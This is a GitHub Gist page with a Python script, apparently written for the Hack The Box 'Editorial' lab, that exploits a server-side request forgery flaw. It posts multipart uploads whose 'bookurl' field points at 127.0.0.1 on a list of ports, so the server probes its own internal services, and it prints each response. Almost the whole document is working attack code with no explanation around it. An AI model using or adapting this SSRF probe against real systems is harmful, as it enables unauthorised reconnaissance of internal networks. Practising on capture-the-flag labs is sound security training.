Created
June 21, 2024 07:21
-
-
Save sec-fortress/0bf143a535a9e2d6ecb5a733e14ee955 to your computer and use it in GitHub Desktop.
This script was generated with the help of chatgpt to test for certain ports in the HTB editorial machine SSRF vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
# List of ports to test | |
ports = [80, 8080, 8000, 6666, 8081, 5000] | |
# URL and headers for the POST request | |
url = "http://editorial.htb/upload-cover" | |
headers = { | |
"Host": "editorial.htb", | |
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", | |
"Accept": "*/*", | |
"Accept-Language": "en-US,en;q=0.5", | |
"Accept-Encoding": "gzip, deflate", | |
"Content-Type": "multipart/form-data; boundary=---------------------------49391253437583440473430002952", | |
"Origin": "http://editorial.htb", | |
"DNT": "1", | |
"Connection": "close", | |
"Referer": "http://editorial.htb/upload" | |
} | |
# Function to create multipart form data | |
def create_form_data(port): | |
boundary = "-----------------------------49391253437583440473430002952" | |
form_data = ( | |
f"{boundary}\r\n" | |
f'Content-Disposition: form-data; name="bookurl"\r\n\r\n' | |
f"http://127.0.0.1:{port}\r\n" | |
f"{boundary}\r\n" | |
f'Content-Disposition: form-data; name="bookfile"; filename="TEST"\r\n' | |
f"Content-Type: application/octet-stream\r\n\r\n\r\n" | |
f"{boundary}--\r\n" | |
) | |
return form_data | |
# Loop through each port and make the POST request | |
for port in ports: | |
form_data = create_form_data(port) | |
headers["Content-Length"] = str(len(form_data)) | |
response = requests.post(url, headers=headers, data=form_data.encode('utf-8')) | |
# Print the response status and content for each port | |
print(f"Port: {port}") | |
print(f"Status Code: {response.status_code}") | |
print(f"Response Text: {response.text}\n") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment